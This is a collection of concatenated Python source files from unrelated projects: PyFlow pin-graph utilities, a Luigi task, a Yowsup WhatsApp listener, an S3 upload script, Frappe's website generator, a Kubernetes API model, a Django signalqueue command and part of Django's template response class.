if src.hasConnections():
if not src.optionEnabled(PinOptions.AllowMultipleConnections) and src.reconnectionPolicy == PinReconnectionPolicy.ForbidConnection:
return False
if src.owningNode().graph() is None or dst.owningNode().graph() is None:
return False
if src.owningNode().graph() is not dst.owningNode().graph():
return False
if src.isAny() and dst.isExec():
if src.dataType not in dst.supportedDataTypes():
return False
if src.isExec() and not dst.isExec():
return False
if not src.isExec() and dst.isExec():
return False
if src.IsValuePin() and dst.IsValuePin():
if src.dataType in dst.allowedDataTypes([], dst._supportedDataTypes) or dst.dataType in src.allowedDataTypes([], src._supportedDataTypes):
a = src.dataType == "AnyPin" and not src.canChangeTypeOnConnection([], src.optionEnabled(PinOptions.ChangeTypeOnConnection), [])
b = dst.canChangeTypeOnConnection([], dst.optionEnabled(PinOptions.ChangeTypeOnConnection), []) and not dst.optionEnabled(PinOptions.AllowAny)
c = not dst.canChangeTypeOnConnection([], dst.optionEnabled(PinOptions.ChangeTypeOnConnection), []) and not dst.optionEnabled(PinOptions.AllowAny)
if all([a, b or c]):
return False
if not src.isDict() and dst.supportOnlyDictElement([], dst.isDict()) and not (dst.checkFree([], selfCheck=False) and dst.canChangeStructure(src._currStructure, [], selfCheck=False)):
if not src.supportDictElement([], src.optionEnabled(PinOptions.DictElementSupported)) and dst.supportOnlyDictElement([], dst.isDict()):
return False
return True
else:
if src.dataType not in dst.supportedDataTypes():
return False
if all([src.dataType in list(dst.allowedDataTypes([], dst._defaultSupportedDataTypes, selfCheck=dst.optionEnabled(PinOptions.AllowMultipleConnections), defaults=True)) + ["AnyPin"],
dst.checkFree([], selfCheck=dst.optionEnabled(PinOptions.AllowMultipleConnections))]):
return True
if all([dst.dataType in list(src.allowedDataTypes([], src._defaultSupportedDataTypes, defaults=True)) + ["AnyPin"],
src.checkFree([])]):
return True
return False
if src.owningNode == dst.owningNode:
return False
return True
def connectPins(src, dst):
"""**Connects two pins**
This are the rules how pins connect:
* Input value pins can have one output connection if :py:class:`PyFlow.Core.Common.PinOptions.AllowMultipleConnections` flag is disabled
* Output value pins can have any number of connections
* Input execs can have any number of connections
* Output execs can have only one connection
:param src: left hand side pin
:type src: :py:class:`PyFlow.Core.PinBase.PinBase`
:param dst: right hand side pin
:type dst: :py:class:`PyFlow.Core.PinBase.PinBase`
:returns: True if connected Successfully
:rtype: bool
"""
if src.direction == PinDirection.Input:
src, dst = dst, src
if not canConnectPins(src, dst):
return False
# input value pins can have one output connection if `AllowMultipleConnections` flag is disabled
# output value pins can have any number of connections
if src.IsValuePin() and dst.IsValuePin():
if dst.hasConnections():
if not dst.optionEnabled(PinOptions.AllowMultipleConnections):
dst.disconnectAll()
# input execs can have any number of connections
# output execs can have only one connection
if src.isExec() and dst.isExec():
if src.hasConnections():
if not src.optionEnabled(PinOptions.AllowMultipleConnections):
src.disconnectAll()
if src.isExec() and dst.isExec():
src.onExecute.connect(dst.call)
dst.aboutToConnect(src)
src.aboutToConnect(dst)
pinAffects(src, dst)
src.setDirty()
dst.setData(src.currentData())
dst.pinConnected(src)
src.pinConnected(dst)
push(dst)
return True
def connectPinsByIndexes(lhsNode=None, lhsOutPinIndex=0, rhsNode=None, rhsInPinIndex=0):
"""Connects pins regardless name.
This function uses pin locations on node. Top most pin have position index 1, pin below - 2 etc.
:param lhsNode: Left hand side node
:type lhsNode: :class:`~PyFlow.Core.NodeBase.NodeBase`
:param lhsOutPinIndex: Out pin position on left hand side node
:type lhsOutPinIndex: int
:param rhsNode: Right hand side node
:type rhsNode: :class:`~PyFlow.Core.NodeBase.NodeBase`
:param rhsInPinIndex: Out pin position on right hand side node
:type rhsInPinIndex: int
"""
if lhsNode is None:
return False
if rhsNode is None:
return False
if lhsOutPinIndex not in lhsNode.orderedOutputs:
return False
if rhsInPinIndex not in rhsNode.orderedInputs:
return False
lhsPin = lhsNode.orderedOutputs[lhsOutPinIndex]
rhsPin = rhsNode.orderedInputs[rhsInPinIndex]
return connectPins(lhsPin, rhsPin)
def traverseConstrainedPins(startFrom, callback):
"""Iterate over constrained and connected pins
Iterates over all constrained chained pins of type :class:`Any <PyFlow.Packages.PyFlowBase.Pins.AnyPin.AnyPin>` and passes pin into callback function. Callback will be executed once for every pin
:param startFrom: First pin to start Iteration
:type startFrom: :class:`~PyFlow.Core.PinBase.PinBase`
:param callback: Functor to execute in each iterated pin.
:type callback: callback(:class:`~PyFlow.Core.PinBase.PinBase`)
"""
if not startFrom.isAny():
return
traversed = set()
def worker(pin):
traversed.add(pin)
callback(pin)
if pin.constraint is None:
nodePins = set()
else:
nodePins = set(pin.owningNode().constraints[pin.constraint])
for connectedPin in getConnectedPins(pin):
if connectedPin.isAny():
nodePins.add(connectedPin)
for neighbor in nodePins:
if neighbor not in traversed:
worker(neighbor)
worker(startFrom)
def disconnectPins(src, dst):
"""Disconnects two pins
:param src: left hand side pin
:type src: :py:class:`~PyFlow.Core.PinBase.PinBase`
:param dst: right hand side pin
:type dst: :py:class:`~PyFlow.Core.PinBase.PinBase`
:returns: True if disconnection success
:rtype: bool
"""
if arePinsConnected(src, dst):
if src.direction == PinDirection.Input:
src, dst = dst, src
src.affects.remove(dst)
dst.affected_by.remove(src)
src.pinDisconnected(dst)
dst.pinDisconnected(src)
push(dst)
if src.isExec() and dst.isExec():
src.onExecute.disconnect(dst.call)
return True
return False
def push(start_from):
"""Marks dirty all ports from start to the right
this part of graph will be recomputed every tick
:param start_from: pin from which recursion begins
:type start_from: :py:class:`~PyFlow.Core.PinBase.PinBase`
"""
if not len(start_from.affects) == 0:
start_from.setDirty()
for i in start_from.affects:
i.setDirty()
push(i)
def extractDigitsFromEndOfString(string):
"""Get digits at end of a string
Example:
>>> nums = extractDigitsFromEndOfString("h3ello154")
>>> print(nums, type(nums))
>>> 154 <class 'int'>
:param string: Input numbered string
:type string: str
    :returns: The digits at the end of the string, as an int
:rtype: int
"""
    result = re.search(r'(\d+)$', string)
if result is not None:
return int(result.group(0))
def removeDigitsFromEndOfString(string):
"""Delete the numbers at the end of a string
Similar to :func:`~PyFlow.Core.Common.extractDigitsFromEndOfString`, but removes digits in the end.
:param string: Input string
:type string: string
:returns: Modified string
:rtype: string
"""
return re.sub(r'\d+$', '', string)
def getUniqNameFromList(existingNames, name):
"""Create unique name
Iterates over **existingNames** and extracts the end digits to find a new unique id
:param existingNames: List of strings where to search for existing indexes
:type existingNames: list
:param name: Name to obtain a unique version from
:type name: str
    :returns: New name not overlapping with any in existingNames
:rtype: str
"""
if name not in existingNames:
return name
ids = set()
for existingName in existingNames:
digits = extractDigitsFromEndOfString(existingName)
if digits is not None:
ids.add(digits)
idx = findGoodId(ids)
nameNoDigits = removeDigitsFromEndOfString(name)
return nameNoDigits + str(idx)
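# Illustrative examples (added sketch):
#   getUniqNameFromList(["node", "node1"], "node") -> "node2"
#   getUniqNameFromList(["node"], "item") -> "item"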
def clearSignal(signal):
"""Disconnects all receivers
:param signal: emitter
:type signal: :class:`~blinker.base.Signal`
"""
for receiver in list(signal.receivers.values()):
if isinstance(receiver, weakref.ref):
signal.disconnect(receiver())
else:
signal.disconnect(receiver)
class SingletonDecorator:
"""Decorator to make class unique, so each time called same object returned
"""
allInstances = []
@staticmethod
def destroyAll():
for instance in SingletonDecorator.allInstances:
instance.destroy()
def __init__(self, cls):
self.cls = cls
self.instance = None
self.allInstances.append(self)
def destroy(self):
del self.instance
self.instance = None
def __call__(self, *args, **kwds):
if self.instance is None:
self.instance = self.cls(*args, **kwds)
return self.instance
class DictElement(tuple):
"""PyFlow dict element class
This subclass of python's :class:`tuple` is to represent dict elements to construct typed dicts
"""
def __new__(self, a=None, b=None):
if a is None and b is None:
new = ()
elif b is None:
if isinstance(a, tuple) and len(a) <= 2:
new = a
else:
raise Exception("non Valid Input")
else:
new = (a, b)
return super(DictElement, self).__new__(self, new)
class PFDict(dict):
"""This subclass of python's :class:`dict` implements a key typed dictionary.
Only defined data types can be used as keys, and only hashable ones as determined by
>>> isinstance(dataType, collections.Hashable)
To make a class Hashable some methods should be implemented:
Example:
::
class C:
def __init__(self, x):
self.x = x
def __repr__(self):
return "C({})".format(self.x)
def __hash__(self):
return hash(self.x)
def __eq__(self, other):
return (self.__class__ == other.__class__ and self.x == other.x)
"""
def __init__(self, keyType, valueType=None, inp={}):
"""
:param keyType: Key dataType
:param valueType: value dataType, defaults to None
:type valueType: optional
:param inp: Construct from another dict, defaults to {}
:type inp: dict, optional
"""
super(PFDict, self).__init__(inp)
self.keyType = keyType
self.valueType = valueType
def __setitem__(self, key, item):
"""Re implements Python Dict __setitem__ to only allow Typed Keys.
Will throw an Exception if non Valid KeyType
"""
if type(key) == self.getClassFromType(self.keyType):
super(PFDict, self).__setitem__(key, item)
else:
raise Exception(
"Valid key should be a {0}".format(self.getClassFromType(self.keyType)))
def getClassFromType(self, pinType):
"""
Gets the internal data structure for a defined pin type
:param pinType: pinType Name
:type pinType: class or None
"""
pin = findPinClassByType(pinType)
if pin:
pinClass = pin.internalDataStructure()
return pinClass
return None
class PinReconnectionPolicy(IntEnum):
"""How to behave if pin has connections and another connection about to be performed.
"""
DisconnectIfHasConnections = 0 #: Current connection will be broken
ForbidConnection = 1 #: New connection will be cancelled
class PinOptions(Flag):
"""Used to determine how Pin behaves.
Apply flags on pin instances.
.. seealso:: :meth:`~PyFlow.Core.PinBase.PinBase.enableOptions` :meth:`~PyFlow.Core.PinBase.PinBase.disableOptions`
"""
ArraySupported = auto() #: Pin can hold array data structure
DictSupported = auto() #: Pin can hold dict data structure
SupportsOnlyArrays = auto() #: Pin will only support other pins with array data structure
AllowMultipleConnections = auto() #: This enables pin to allow more that one input connection. See :func:`~PyFlow.Core.Common.connectPins`
ChangeTypeOnConnection = auto() #: Used by :class:`~PyFlow.Packages.PyFlowBase.Pins.AnyPin.AnyPin` to determine if it can change its data type on new connection.
RenamingEnabled = auto() #: Determines if pin can be renamed
Dynamic = auto() #: Specifies if pin was created dynamically (during program runtime)
AlwaysPushDirty = auto() #: Pin will always be seen as dirty (computation needed)
Storable = auto() #: Determines if pin data can be stored when pin serialized
    AllowAny = auto() #: Special flag that allows a pin to be :class:`~PyFlow.Packages.PyFlowBase.Pins.AnyPin.AnyPin`, which means non typed without being marked as an error. By default an :py:class:`PyFlow.Packages.PyFlowBase.Pins.AnyPin.AnyPin` needs to be initialized with some data type, i.e. by another defined pin. This flag overrides that. Used in lists and non typed nodes
    DictElementSupported = auto() #: Dicts are constructed with :class:`DictElement` objects. So dict pins will only allow other dicts until this flag is enabled. Used in :class:`~PyFlow.Packages.PyFlowBase.Nodes.makeDict` node
class StructureType(IntEnum):
"""Used to determine structure type for values.
"""
Single = 0 #: Single data structure
Array = 1 #: Python list structure, represented as arrays -> typed and lists -> non typed
    Dict = 2 #: :py:class:`PFDict` structure, is basically a key typed python dict
Multi = 3 #: This means it can became any of the previous ones on connection/user action
def findStructFromValue(value):
"""Finds :class:`~PyFlow.Core.Common.StructureType` from value
:param value: input value to find structure.
:returns: Structure Type for input value
:rtype: :class:`~PyFlow.Core.Common.StructureType`
"""
if isinstance(value, list):
return StructureType.Array
if isinstance(value, dict):
return StructureType.Dict
return StructureType.Single
class PinSelectionGroup(IntEnum):
"""Used in :meth:`~PyFlow.Core.NodeBase.NodeBase.getPinSG` for optimization purposes
"""
Inputs = 0 #: Input pins
Outputs = 1 #: Outputs pins
BothSides = 2 #: Both sides pins
class AccessLevel(IntEnum):
"""Can be used for code generation
"""
public = 0 #: public
private = 1 #: private
protected = 2 #: protected
class PinDirection(IntEnum):
"""Determines whether it is input pin or output
"""
Input = 0 #: Left side pins
Output = 1 #: Right side pins
class NodeTypes(IntEnum):
"""Determines whether it is callable node or pure
"""
Callable = 0 #: Callable node is a node with exec pins
Pure = 1 #: Normal nodes
class Direction(IntEnum):
""" Direction identifiers
"""
Left = 0 #: Left
Right = 1 #: Right
Up = 2 #: Up
Down = 3 #: Down
class PinSpecifires:
"""Pin specifires constants
:var SUPPORTED_DATA_TYPES: To specify supported data types list
:var CONSTRAINT: To specify type constraint key
:var STRUCT_CONSTRAINT: To specify struct constraint key
:var ENABLED_OPTIONS: To enable options
:var DISABLED_OPTIONS: To disable options
:var INPUT_WIDGET_VARIANT: To specify widget variant string
:var DESCRIPTION: To specify description for pin, which will be used as tooltip
:var VALUE_LIST: Specific for string pin. If specified, combo box will be created
:var VALUE_RANGE: Specific for ints and floats. If specified, slider will be created instead of value box
:var DRAGGER_STEPS: To specify custom value dragger steps
"""
SUPPORTED_DATA_TYPES = "supportedDataTypes"
CONSTRAINT = "constraint"
STRUCT_CONSTRAINT = "structConstraint"
ENABLED_OPTIONS = "enabledOptions"
DISABLED_OPTIONS = "disabledOptions"
INPUT_WIDGET_VARIANT = "inputWidgetVariant"
DESCRIPTION = "Description"
VALUE_LIST = "ValueList"
VALUE_RANGE = "ValueRange"
DRAGGER_STEPS = "DraggerSteps"
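    # Illustrative sketch (not from the original file): these constants are plain
    # string keys, so a pin definition typically collects them into a dict. The
    # exact API that consumes such a dict (e.g. a createInputPin(...) call) is an
    # assumption here, not something defined in this module.
    # specifiers = {
    #     PinSpecifires.VALUE_RANGE: (0, 100),
    #     PinSpecifires.DRAGGER_STEPS: [10, 1, 0.1],
    #     PinSpecifires.DESCRIPTION: "Blend factor, shown as a slider",
    # }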
class NodeMeta:
"""Node meta constants
:var CATEGORY: To specify category for node. Will be considered by node box
:var KEYWORDS: To specify list of additional keywords, used in node box search field
:var CACHE_ENABLED: To specify if node is cached or not
"""
CATEGORY = "Category"
KEYWORDS = "Keywords"
CACHE_ENABLED = "CacheEnabled"
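    # Illustrative sketch (assumed usage, not from this file): node metadata is a
    # plain dict keyed by the constants above, for example:
    # meta = {
    #     NodeMeta.CATEGORY: "Math|Basic",
    #     NodeMeta.KEYWORDS: ["add", "sum"],
    #     NodeMeta.CACHE_ENABLED: True,
    # }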
|
py | 1a32edb174c2137d634770140e718bfc388a2cc8 | import luigi
class MyTask(luigi.ExternalTask):
param = luigi.Parameter(default=42)
def run(self):
f = self.output().open('w')
f.write("hello world from run")
f.close()
def output(self):
return luigi.LocalTarget('/tmp/foo/bar-%s.txt' % str(self.param))
if __name__ == '__main__':
luigi.run(['MyTask', '--local-scheduler'])
|
py | 1a32ee8cbfb03a873bf8765c909206533a9213e8 | '''
Copyright (c) <2012> Tarek Galal <[email protected]>
Permission is hereby granted, free of charge, to any person obtaining a copy of this
software and associated documentation files (the "Software"), to deal in the Software
without restriction, including without limitation the rights to use, copy, modify,
merge, publish, distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR
A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE
OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
'''
import os
parentdir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
os.sys.path.insert(0,parentdir)
import datetime, sys
if sys.version_info >= (3, 0):
raw_input = input
from Yowsup.connectionmanager import YowsupConnectionManager
class WhatsappListenerClient:
def __init__(self, keepAlive = False, sendReceipts = False):
self.sendReceipts = sendReceipts
connectionManager = YowsupConnectionManager()
connectionManager.setAutoPong(keepAlive)
self.signalsInterface = connectionManager.getSignalsInterface()
self.methodsInterface = connectionManager.getMethodsInterface()
self.signalsInterface.registerListener("message_received", self.onMessageReceived)
self.signalsInterface.registerListener("auth_success", self.onAuthSuccess)
self.signalsInterface.registerListener("auth_fail", self.onAuthFailed)
self.signalsInterface.registerListener("disconnected", self.onDisconnected)
self.cm = connectionManager
def login(self, username, password):
self.username = username
self.methodsInterface.call("auth_login", (username, password))
while True:
raw_input()
def onAuthSuccess(self, username):
print("Authed %s" % username)
self.methodsInterface.call("ready")
def onAuthFailed(self, username, err):
print("Auth Failed!")
def onDisconnected(self, reason):
print("Disconnected because %s" %reason)
def onMessageReceived(self, messageId, jid, messageContent, timestamp, wantsReceipt, pushName, isBroadCast):
formattedDate = datetime.datetime.fromtimestamp(timestamp).strftime('%d-%m-%Y %H:%M')
print("%s [%s]:%s"%(jid, formattedDate, messageContent))
if wantsReceipt and self.sendReceipts:
self.methodsInterface.call("message_ack", (jid, messageId))
|
py | 1a32ef1a28a23954681bd0585cd317bb5a535260 | from user_Key import access_key,secret_access_key
import boto3
import os
client = boto3.client('s3', aws_access_key_id = access_key,
aws_secret_access_key = secret_access_key)
for file in os.listdir():
if '.py' in file:
upload_file_bucket = 'trialandtest'
upload_file_key = 'python scripts/' + str(file)
client.upload_file(file, upload_file_bucket, upload_file_key)
elif '.csv' in file:
upload_file_bucket_csv = 'time1231'
upload_file_key_csv = ' csv_files/' + str(file)
client.upload_file(file, upload_file_bucket_csv, upload_file_key_csv)
# elif 'file type' in file:
# upload_file_bucket_csv = 'bucketname'
# upload_file_key_csv = ' foldername' + str(file)
# client.upload_file(file, upload_file_bucket_csv, upload_file_key_csv)
|
py | 1a32ef9ffa06e69d5e1ddd28848db9acae3b10da | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
from frappe.website.utils import cleanup_page_name
from frappe.website.render import clear_cache
from frappe.modules import get_module_name
class WebsiteGenerator(Document):
website = frappe._dict()
def __init__(self, *args, **kwargs):
self.route = None
super(WebsiteGenerator, self).__init__(*args, **kwargs)
def get_website_properties(self, key=None, default=None):
out = getattr(self, '_website', None) or getattr(self, 'website', None) or {}
if not isinstance(out, dict):
# website may be a property too, so ignore
out = {}
if key:
return out.get(key, default)
else:
return out
def autoname(self):
if not self.name and self.meta.autoname != "hash":
self.name = self.scrubbed_title()
def onload(self):
self.get("__onload").update({
"is_website_generator": True,
"published": self.is_website_published()
})
def validate(self):
self.set_route()
def set_route(self):
if self.is_website_published() and not self.route:
self.route = self.make_route()
if self.route:
self.route = self.route.strip('/.')[:139]
def make_route(self):
'''Returns the default route. If `route` is specified in DocType it will be
route/title'''
from_title = self.scrubbed_title()
if self.meta.route:
return self.meta.route + '/' + from_title
else:
return from_title
def scrubbed_title(self):
return self.scrub(self.get(self.get_title_field()))
def get_title_field(self):
'''return title field from website properties or meta.title_field'''
title_field = self.get_website_properties('page_title_field')
if not title_field:
if self.meta.title_field:
title_field = self.meta.title_field
elif self.meta.has_field('title'):
title_field = 'title'
else:
title_field = 'name'
return title_field
def clear_cache(self):
super(WebsiteGenerator, self).clear_cache()
clear_cache(self.route)
def scrub(self, text):
return cleanup_page_name(text).replace('_', '-')
def get_parents(self, context):
'''Return breadcrumbs'''
pass
def on_update(self):
self.send_indexing_request()
def on_trash(self):
self.clear_cache()
self.send_indexing_request('URL_DELETED')
def is_website_published(self):
"""Return true if published in website"""
if self.get_condition_field():
return self.get(self.get_condition_field()) and True or False
else:
return True
def get_condition_field(self):
condition_field = self.get_website_properties('condition_field')
if not condition_field:
if self.meta.is_published_field:
condition_field = self.meta.is_published_field
return condition_field
def get_page_info(self):
route = frappe._dict()
route.update({
"doc": self,
"page_or_generator": "Generator",
"ref_doctype":self.doctype,
"idx": self.idx,
"docname": self.name,
"controller": get_module_name(self.doctype, self.meta.module),
})
route.update(self.get_website_properties())
if not route.page_title:
route.page_title = self.get(self.get_title_field())
return route
def send_indexing_request(self, operation_type='URL_UPDATED'):
"""Send indexing request on update/trash operation."""
if frappe.db.get_single_value('Website Settings', 'enable_google_indexing') \
and self.is_website_published() and self.meta.allow_guest_to_view:
url = frappe.utils.get_url(self.route)
frappe.enqueue('frappe.website.doctype.website_settings.google_indexing.publish_site', \
url=url, operation_type=operation_type) |
py | 1a32efa27d9b4ee315e6a18077fba36c9836fadb | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .key_vault_management_client import KeyVaultManagementClient
from .version import VERSION
__all__ = ['KeyVaultManagementClient']
__version__ = VERSION
|
py | 1a32f1228c6c69e3794abf864c6ab5a9b6b46ef1 | #!/usr/bin/env python
# encoding: utf-8
import sys, os
from django.core.management.base import BaseCommand, CommandError
from django.core.exceptions import ImproperlyConfigured
#from pprint import pformat
from optparse import make_option
from . import echo_banner
class Command(BaseCommand):
option_list = BaseCommand.option_list + (
make_option('--queuename', '-n', dest='queue_name', default='default',
help="Name of queue, as specified in settings.py (defaults to 'default')",
),
make_option('--indent', '-t', dest='indent', default='0',
help="Levels to indent the output.",
),
)
help = ('Dumps the contents of a signal queue to a serialized format.')
requires_model_validation = True
can_import_settings = True
def handle(self, *args, **options):
echo_banner()
try:
return self.dump_queue(args, options)
except ImproperlyConfigured, err:
self.echo("*** ERROR in configuration: %s" % err)
self.echo("*** Check the signalqueue-related options in your settings.py.")
def echo(self, *args, **kwargs):
""" Print in color to stdout. """
text = " ".join([str(item) for item in args])
DEBUG = False
if DEBUG:
color = kwargs.get("color",32)
self.stdout.write("\033[0;%dm%s\033[0;m" % (color, text))
else:
print text
def dump_queue(self, apps, options):
from django.conf import settings
from signalqueue import SQ_RUNMODES as runmodes
from signalqueue.worker import backends
import json as library_json
queue_name = options.get('queue_name')
indent = int(options.get('indent'))
queues = backends.ConnectionHandler(settings.SQ_QUEUES, runmodes['SQ_ASYNC_MGMT'])
if not queue_name in queues:
self.echo("\n--- No definition found for a queue named '%s'" % queue_name,
color=16)
self.echo("\n--- Your defined queues have these names: '%s'" % (
"', '".join(queues.keys()),),
color=16)
self.echo("\n>>> Exiting ...\n\n",
color=16)
sys.exit(2)
queue = queues[queue_name]
try:
queue_available = queue.ping()
except:
self.echo("\n--- Can't ping the backend for %s named '%s'" % (
queue.__class__.__name__, queue_name),
color=16)
self.echo("\n--- Is the server running?",
color=16)
self.echo("\n>>> Exiting ...\n\n",
color=16)
sys.exit(2)
if not queue_available:
self.echo("\n--- Can't ping the backend for %s named '%s'" % (
queue.__class__.__name__, queue_name),
color=16)
self.echo("\n--- Is the server running?",
color=16)
self.echo("\n>>> Exiting ...\n\n",
color=16)
sys.exit(2)
queue_json = repr(queue)
if indent > 0:
queue_out = library_json.loads(queue_json)
print library_json.dumps(queue_out, indent=indent)
else:
print queue_json |
py | 1a32f2b4cd7157a7fdec2ad17394396bcaafbad6 | # coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
OpenAPI spec version: v1.15.6
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
class V1HorizontalPodAutoscaler(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'api_version': 'str',
'kind': 'str',
'metadata': 'V1ObjectMeta',
'spec': 'V1HorizontalPodAutoscalerSpec',
'status': 'V1HorizontalPodAutoscalerStatus'
}
attribute_map = {
'api_version': 'apiVersion',
'kind': 'kind',
'metadata': 'metadata',
'spec': 'spec',
'status': 'status'
}
def __init__(self, api_version=None, kind=None, metadata=None, spec=None, status=None): # noqa: E501
"""V1HorizontalPodAutoscaler - a model defined in OpenAPI""" # noqa: E501
self._api_version = None
self._kind = None
self._metadata = None
self._spec = None
self._status = None
self.discriminator = None
if api_version is not None:
self.api_version = api_version
if kind is not None:
self.kind = kind
if metadata is not None:
self.metadata = metadata
if spec is not None:
self.spec = spec
if status is not None:
self.status = status
@property
def api_version(self):
"""Gets the api_version of this V1HorizontalPodAutoscaler. # noqa: E501
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources # noqa: E501
:return: The api_version of this V1HorizontalPodAutoscaler. # noqa: E501
:rtype: str
"""
return self._api_version
@api_version.setter
def api_version(self, api_version):
"""Sets the api_version of this V1HorizontalPodAutoscaler.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources # noqa: E501
:param api_version: The api_version of this V1HorizontalPodAutoscaler. # noqa: E501
:type: str
"""
self._api_version = api_version
@property
def kind(self):
"""Gets the kind of this V1HorizontalPodAutoscaler. # noqa: E501
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds # noqa: E501
:return: The kind of this V1HorizontalPodAutoscaler. # noqa: E501
:rtype: str
"""
return self._kind
@kind.setter
def kind(self, kind):
"""Sets the kind of this V1HorizontalPodAutoscaler.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds # noqa: E501
:param kind: The kind of this V1HorizontalPodAutoscaler. # noqa: E501
:type: str
"""
self._kind = kind
@property
def metadata(self):
"""Gets the metadata of this V1HorizontalPodAutoscaler. # noqa: E501
:return: The metadata of this V1HorizontalPodAutoscaler. # noqa: E501
:rtype: V1ObjectMeta
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""Sets the metadata of this V1HorizontalPodAutoscaler.
:param metadata: The metadata of this V1HorizontalPodAutoscaler. # noqa: E501
:type: V1ObjectMeta
"""
self._metadata = metadata
@property
def spec(self):
"""Gets the spec of this V1HorizontalPodAutoscaler. # noqa: E501
:return: The spec of this V1HorizontalPodAutoscaler. # noqa: E501
:rtype: V1HorizontalPodAutoscalerSpec
"""
return self._spec
@spec.setter
def spec(self, spec):
"""Sets the spec of this V1HorizontalPodAutoscaler.
:param spec: The spec of this V1HorizontalPodAutoscaler. # noqa: E501
:type: V1HorizontalPodAutoscalerSpec
"""
self._spec = spec
@property
def status(self):
"""Gets the status of this V1HorizontalPodAutoscaler. # noqa: E501
:return: The status of this V1HorizontalPodAutoscaler. # noqa: E501
:rtype: V1HorizontalPodAutoscalerStatus
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this V1HorizontalPodAutoscaler.
:param status: The status of this V1HorizontalPodAutoscaler. # noqa: E501
:type: V1HorizontalPodAutoscalerStatus
"""
self._status = status
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1HorizontalPodAutoscaler):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
py | 1a32f2d45b2458b516e1e5b45b5b10c39a5f6e9f | # from profilehooks import profile
from django.http import HttpResponse
from .loader import get_template, select_template
class ContentNotRenderedError(Exception):
pass
class SimpleTemplateResponse(HttpResponse):
rendering_attrs = ['template_name', 'context_data', '_post_render_callbacks']
def __init__(self, template, context=None, content_type=None, status=None,
charset=None, using=None):
# It would seem obvious to call these next two members 'template' and
# 'context', but those names are reserved as part of the test Client
# API. To avoid the name collision, we use different names.
self.template_name = template
self.context_data = context
self.using = using
self._post_render_callbacks = []
# _request stores the current request object in subclasses that know
# about requests, like TemplateResponse. It's defined in the base class
# to minimize code duplication.
# It's called self._request because self.request gets overwritten by
# django.test.client.Client. Unlike template_name and context_data,
# _request should not be considered part of the public API.
self._request = None
# content argument doesn't make sense here because it will be replaced
# with rendered template so we always pass empty string in order to
# prevent errors and provide shorter signature.
super().__init__('', content_type, status, charset=charset)
# _is_rendered tracks whether the template and context has been baked
# into a final response.
# Super __init__ doesn't know any better than to set self.content to
# the empty string we just gave it, which wrongly sets _is_rendered
# True, so we initialize it to False after the call to super __init__.
self._is_rendered = False
def __getstate__(self):
"""
Raise an exception if trying to pickle an unrendered response. Pickle
only rendered data, not the data used to construct the response.
"""
obj_dict = self.__dict__.copy()
if not self._is_rendered:
raise ContentNotRenderedError('The response content must be '
'rendered before it can be pickled.')
for attr in self.rendering_attrs:
if attr in obj_dict:
del obj_dict[attr]
return obj_dict
def resolve_template(self, template):
"""Accept a template object, path-to-template, or list of paths."""
if isinstance(template, (list, tuple)):
return select_template(template, using=self.using)
elif isinstance(template, str):
return get_template(template, using=self.using)
else:
return template
def resolve_context(self, context):
return context
@property
def rendered_content(self):
"""Return the freshly rendered content for the template and context
described by the TemplateResponse.
This *does not* set the final content of the response. To set the
response content, you must either call render(), or set the
content explicitly using the value of this property.
"""
template = self.resolve_template(self.template_name)
context = self.resolve_context(self.context_data)
return template.render(context, self._request)
def add_post_render_callback(self, callback):
"""Add a new post-rendering callback.
If the response has already been rendered,
